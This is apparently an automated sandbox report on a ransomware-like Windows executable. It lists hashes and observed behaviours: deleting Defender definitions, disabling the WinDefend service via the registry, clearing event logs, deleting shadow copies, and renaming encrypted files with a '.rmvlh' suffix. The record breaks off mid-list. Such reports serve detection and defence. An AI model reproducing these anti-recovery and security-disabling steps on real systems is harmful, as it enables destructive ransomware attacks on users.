Analysis
-
max time kernel
110s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 11:09
Static task
static1
Behavioral task
behavioral1
Sample
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
Resource
win10-en-20211208
General
-
Target
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
-
Size
2.5MB
-
MD5
9c156aff00fc0ac66ed918d000041932
-
SHA1
f2fc2bade3f0447ff68bf2c00dadcce1a966b4a0
-
SHA256
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
-
SHA512
43834c400a1a4fb83db8c16332345c86b1e568d45944b31721e9098f00dfe3be731d0661c02e103a4179cf8f35771d842d4dfa36aefd1a60f6577448f2600b02
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3220 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Program Files directory 64 IoCs
Processes:
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_BfcFJ60wSfE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XB5kDCSpuh00.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_SHD8Ga0cK1A0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_iUcjNoPdyeE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\ado\msador28.tlb cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Z0kzsJ1HtO40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_urqyWfJBd0E0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VpeGcDRx_600.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xBqcQlci4kU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fhU_Z6zugZM0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_VNw5g3Qbr1U0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UMSBdz8Ts9k0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wQN5AI0iNYw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\Welcome.html.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_pPwk5yAlVgA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gO-pvtuqATU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gdwyXg3xypw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_altgr.xml cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_hN28bvevx-M0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_EWoFHzeUDqE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_7hiRmaQnIQA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D3N2gOcL0mQ0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_92oFVzAOjao0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_X-BDUvRup240.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_mtM1aX1OgJc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_jCbFDIbA3Og0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_4dQJGfwtA7I0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_bGzC-_3gzRQ0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UNjpLQN5E9A0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XK87vMmqKwc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_YyhcRbDQLPI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D6LiYSJy_580.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fEkoqdYFmNM0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_qY450fw5BSo0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dfWez84sGvw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_GXY1VYBujJ00.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_cmr1HdkCTPE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xlnSAD8vFOM0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Garden.htm cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\IPSEventLogMsg.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Gb2tZdhSuaI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_MUCqyzXav_k0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_HRWaX3r8utk0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_rzyYxO7H7VA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_FL_9_8wZ6zU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zPnEz3aOdsA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_JBJ1ySAXUc40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_tLcEOpc0HzE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dJglFczl9640.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_AsXRmUtmEtA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wW-RskY7mRg0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_9bBxLSh4Xmw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_WFkHCgwaei40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zwhtPkcdlF40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_532CRsP1Vac0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_F22779o8nzs0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 916 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exepid process 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3412 powershell.exe 3412 powershell.exe 3412 powershell.exe 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3148 wevtutil.exe Token: SeBackupPrivilege 3148 wevtutil.exe Token: SeSecurityPrivilege 3184 wevtutil.exe Token: SeBackupPrivilege 3184 wevtutil.exe Token: SeSecurityPrivilege 2084 wevtutil.exe Token: SeBackupPrivilege 2084 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1728 wmic.exe Token: SeSecurityPrivilege 1728 wmic.exe Token: SeTakeOwnershipPrivilege 1728 wmic.exe Token: SeLoadDriverPrivilege 1728 wmic.exe Token: SeSystemProfilePrivilege 1728 wmic.exe Token: SeSystemtimePrivilege 1728 wmic.exe Token: SeProfSingleProcessPrivilege 1728 wmic.exe Token: SeIncBasePriorityPrivilege 1728 wmic.exe Token: SeCreatePagefilePrivilege 1728 wmic.exe Token: SeBackupPrivilege 1728 wmic.exe Token: SeRestorePrivilege 1728 wmic.exe Token: SeShutdownPrivilege 1728 wmic.exe Token: SeDebugPrivilege 1728 wmic.exe Token: SeSystemEnvironmentPrivilege 1728 wmic.exe Token: SeRemoteShutdownPrivilege 1728 wmic.exe Token: SeUndockPrivilege 1728 wmic.exe Token: SeManageVolumePrivilege 1728 wmic.exe Token: 33 1728 wmic.exe Token: 34 1728 wmic.exe Token: 35 1728 wmic.exe Token: 36 1728 wmic.exe Token: SeIncreaseQuotaPrivilege 3252 wmic.exe Token: SeSecurityPrivilege 3252 wmic.exe Token: SeTakeOwnershipPrivilege 3252 wmic.exe Token: SeLoadDriverPrivilege 3252 wmic.exe Token: SeSystemProfilePrivilege 3252 wmic.exe Token: SeSystemtimePrivilege 3252 wmic.exe Token: SeProfSingleProcessPrivilege 3252 wmic.exe Token: SeIncBasePriorityPrivilege 3252 wmic.exe Token: SeCreatePagefilePrivilege 3252 wmic.exe Token: SeBackupPrivilege 3252 wmic.exe Token: SeRestorePrivilege 3252 wmic.exe Token: SeShutdownPrivilege 3252 wmic.exe Token: SeDebugPrivilege 3252 wmic.exe Token: SeSystemEnvironmentPrivilege 3252 wmic.exe Token: SeRemoteShutdownPrivilege 3252 wmic.exe Token: SeUndockPrivilege 3252 wmic.exe Token: SeManageVolumePrivilege 3252 wmic.exe Token: 33 3252 wmic.exe Token: 34 3252 wmic.exe Token: 35 3252 wmic.exe Token: 36 3252 wmic.exe Token: SeIncreaseQuotaPrivilege 3252 wmic.exe Token: SeSecurityPrivilege 3252 wmic.exe Token: SeTakeOwnershipPrivilege 3252 wmic.exe Token: SeLoadDriverPrivilege 3252 wmic.exe Token: SeSystemProfilePrivilege 3252 wmic.exe Token: SeSystemtimePrivilege 3252 wmic.exe Token: SeProfSingleProcessPrivilege 3252 wmic.exe Token: SeIncBasePriorityPrivilege 3252 wmic.exe Token: SeCreatePagefilePrivilege 3252 wmic.exe Token: SeBackupPrivilege 3252 wmic.exe Token: SeRestorePrivilege 3252 wmic.exe Token: SeShutdownPrivilege 3252 wmic.exe Token: SeDebugPrivilege 3252 wmic.exe Token: SeSystemEnvironmentPrivilege 3252 wmic.exe Token: SeRemoteShutdownPrivilege 3252 wmic.exe Token: SeUndockPrivilege 3252 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2632 wrote to memory of 3796 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3796 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3796 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 3796 wrote to memory of 3864 3796 net.exe net1.exe PID 3796 wrote to memory of 3864 3796 net.exe net1.exe PID 3796 wrote to memory of 3864 3796 net.exe net1.exe PID 2632 wrote to memory of 3360 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3360 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3360 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 3360 wrote to memory of 512 3360 net.exe net1.exe PID 3360 wrote to memory of 512 3360 net.exe net1.exe PID 3360 wrote to memory of 512 3360 net.exe net1.exe PID 2632 wrote to memory of 800 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 800 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 800 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 800 wrote to memory of 2220 800 net.exe net1.exe PID 800 wrote to memory of 2220 800 net.exe net1.exe PID 800 wrote to memory of 2220 800 net.exe net1.exe PID 2632 wrote to memory of 2812 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2812 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2812 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2812 wrote to memory of 788 2812 net.exe net1.exe PID 2812 wrote to memory of 788 2812 net.exe net1.exe PID 2812 wrote to memory of 788 2812 net.exe net1.exe PID 2632 wrote to memory of 3728 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3728 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3728 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 3728 wrote to memory of 1460 3728 net.exe net1.exe PID 3728 wrote to memory of 1460 3728 net.exe net1.exe PID 3728 wrote to memory of 1460 3728 net.exe net1.exe PID 2632 wrote to memory of 3516 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3516 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 3516 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 3516 wrote to memory of 480 3516 net.exe net1.exe PID 3516 wrote to memory of 480 3516 net.exe net1.exe PID 3516 wrote to memory of 480 3516 net.exe net1.exe PID 2632 wrote to memory of 2824 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2824 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 2824 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2824 wrote to memory of 1244 2824 net.exe net1.exe PID 2824 wrote to memory of 1244 2824 net.exe net1.exe PID 2824 wrote to memory of 1244 2824 net.exe net1.exe PID 2632 wrote to memory of 1276 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 1276 2632 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe net.exe PID 2632 wrote to memory of 1276 2632 